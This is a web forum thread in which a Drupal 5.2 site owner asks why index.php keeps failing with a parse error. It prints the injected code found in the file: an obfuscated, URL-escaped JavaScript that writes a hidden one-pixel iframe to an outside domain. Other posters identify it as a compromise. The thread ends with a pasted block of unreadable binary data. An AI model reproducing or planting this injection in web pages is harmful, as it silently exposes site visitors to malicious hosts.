i just done my fresh installation of drupal 5.2, after the installation everything is fine, but after the next day i visit again the website i got this error:

Parse error: parse error, unexpected '<' in /hsphere/local/home/cableguy/blogxplore.com/index.php on line 37

So, i overwrite index.php from fresh copy of drupal 5.2 which is downloaded from website, after that everythings going fine again, but i leave it after a while and come back to the website it show me that error again above.

anyone here know what's wrong with it?

Comments

kvaes’s picture

Check the cron jobs?

Take a copy of the working version, wait for it to happen again, and compare what changed?
(by using for example "diff")

http://www.kvaes.be - http://www.artistiku.com - http://www.tuxsolutions.com

edwardlee’s picture

yup, i have compare both copy which is works and currently error copy.

This is works copy which is original from zip package.

<?php
// $Id: index.php,v 1.91 2006/12/12 09:32:18 unconed Exp $

/**
 * @file
 * The PHP page that serves all page requests on a Drupal installation.
 *
 * The routines here dispatch control to the appropriate handler, which then
 * prints the appropriate page.
 */

require_once './includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);

$return = menu_execute_active_handler();

// Menu status constants are integers; page content is a string.
if (is_int($return)) {
  switch ($return) {
    case MENU_NOT_FOUND:
      drupal_not_found();
      break;
    case MENU_ACCESS_DENIED:
      drupal_access_denied();
      break;
    case MENU_SITE_OFFLINE:
      drupal_site_offline();
      break;
  }
}
elseif (isset($return)) {
  // Print any value (including an empty string) except NULL or undefined:
  print theme('page', $return);

}

drupal_page_footer();

This is error copy which have the error shown above i mentioned:

<?php
// $Id: index.php,v 1.91 2006/12/12 09:32:18 unconed Exp $

/**
 * @file
 * The PHP page that serves all page requests on a Drupal installation.
 *
 * The routines here dispatch control to the appropriate handler, which then
 * prints the appropriate page.
 */

require_once './includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);

$return = menu_execute_active_handler();

// Menu status constants are integers; page content is a string.
if (is_int($return)) {
  switch ($return) {
    case MENU_NOT_FOUND:
      drupal_not_found();
      break;
    case MENU_ACCESS_DENIED:
      drupal_access_denied();
      break;
    case MENU_SITE_OFFLINE:
      drupal_site_offline();
      break;
  }
}
elseif (isset($return)) {
  // Print any value (including an empty string) except NULL or undefined:
  print theme('page', $return);

}

drupal_page_footer();<b><Script Language='Javascript'>
<!--
document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%64%65%6D%30%6E%2E%62%69%7A%2F%61%64%76%74%64%73%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E'));
//-->
</Script></b>

The index.php file was automatically added javascript, i was shock that when i was in my office it show me error when morning, i try logon to my house pc it also the same error.

But evening after work back home i use my home pc it doesnt appear any error.

kvaes’s picture

check the last lines of you error-version, it contains javascript...
if this came from you, be sure to print it thru correct php syntax, as otherwise you'll get parsing errors

http://www.kvaes.be - http://www.artistiku.com - http://www.tuxsolutions.com

edwardlee’s picture

i never create the javascript myself, i dont know why it automatically create that javascript. can you please more details on how to fix this? thanks

kvaes’s picture

don't ask me why, but it appears you've been "hacked"

When decrypting (http://scriptasylum.com/tutorials/encdec/encode-decode.html) the code you provide, it appaers that it's an iframe to
http://dem0n.biz/advtds/out.php?s_id=1

Check your apache logs (or ask your isp to do it for you) if the hack occured from an external source, or if it was done by another account within the server (security issue with you provider then!)

http://www.kvaes.be - http://www.artistiku.com - http://www.tuxsolutions.com

edwardlee’s picture

now it get hacked again:

��X[o�6~��`� �Z#���I��.b�h�$5�IӢ( �HI�P�JRO��CRi��N�]ш"ϕ߹���˟.ֿ^_��֒\|�����$�tv�$��K�ˏ��o�rqB>X-r�$W��#B����e�l����l�t���'w�g���56�j�,���ԉ��ecV3 �/^��t.z)iS�"�Ddx�@tZq��^���g��*i��|��:M�W������?:q��.Tcyc������hY~g��=�+�������$���g��\EWL؏�_G��*�m+EN�PM���*�䯢�.#Ri^L�݀�w�� i+�؉���r�ih r���(+;r�E�������WvDŽJIܴ} ׷�-��F|��(kFLE���q��T�C��Ji�w�X�����IAo���CDMK���~qv�؝�a���܀��3A��RFٿE݂%�����$_���������Ͽ}��g����i^���r�>Mw/�qi��˳�A`I5@�%n~�s�,�����"���e� nⳢ~� ��q��+��+�(�#�����7Tǒ`$o�N�VB&n�`?��:ּ�+�A.9���Q�&��8�=�V�����g� L̲: ;q >�P?�Uq!���j�����PӜ:��$F��{�E���)#�{�p�MMK�{��}L �A�A����i'{_`�0����n�J��B i�x �N���a�x�GUs��.2�Ny`F�斠��!FgSF�cBEsk�vF䳜�9��͔]�tW�sk~���fI'�C���E#I<���d@�$JBg��@���{�Y`�_�c�c �=��F1(X`��k��]~��H��5�+�V�#���X4��8R9��rdCRѴ������Iޔ�ZE�S��>�{7N�dq����W���i�Ĉ?�~�mDn���u��+�����H7d+LE�"�F�h��Wˊ�������:�v�_� J|.����$l+��)���^��l��sH��~R�sݏfp���A�O��$c ����V��G�U�@�9��GXE�$��b�XѸ~d���tZ9��9 8I7\��ߡO#�'��$.�NH5vv��7�JR.ؚ��E��cH�Nʣ�����S��~C�p��P${�F��d�[Xe���*���ַAHo��7��3r�M��p|�J"��q�Qt&�B����cT� 6'ۀ�g�C[@�g�[�K����9��0�3��P=fX���w��G�O�[A �k*$�[���)��/I9����R�I��q7a�fR���f��������'��Qw�u;��|N�q�Ǵ�P�˷;�VJ���d��f��O[o5�?�5�yZLo#J�D<�i�_��O���A\<�����m��?���VxD�%�|�Ƴ��Q�F�a3����?ﴆOrGR^g'N}�x'Б��%U���/��t���o8�Ɲ��+���gr��8W��P*�3�� ������rP�u�������*nã��p���DAC�]ڹ�]K%���=s��ͮa '���� o��w`�t�s���Ш7���L�6KU���Z5ev��B�l�x)J�4���9�$%��C��y��� ��j����v�4�}���1�:�`˘C�< ���B�RBm�;cU U�Y���!w�AM l��D�žů���9d#�Z�;�����������6>`V���dI�X'9(�_ƴW ��^V� t5`��f�t��)�:�B䰹���5��@<�0?O5 wH���]�Ar��!y۫ �s`j��ٚ�7ᾏ.g�}I��e���Z�%\Sr���ggv���w�qW�{��߉��35݁<��ZՐ-8 A���e���V齥#?�YG�DG��R���������V!��� ����r)w�3���ܷ51 j���������[����{��K�����r,���(������`��`E�٠�c8@G����p�{LZ�o@U<���-��l� ��xW�1����N���O{��T卡�1��¡�L7Ժ���[��8�k���L��5� d�~HT���n�y�$�p9��h8>&�:��n��?z�t(���W��N���]?�m�bT�a8.�0�[����+��������p���F�B�&���2P��&�xߟ�D�d�

now my whole site cant be access anymore even i overwrite the index.php

ben finklea’s picture

Anything?

--Ben Finklea, CEO
Volacci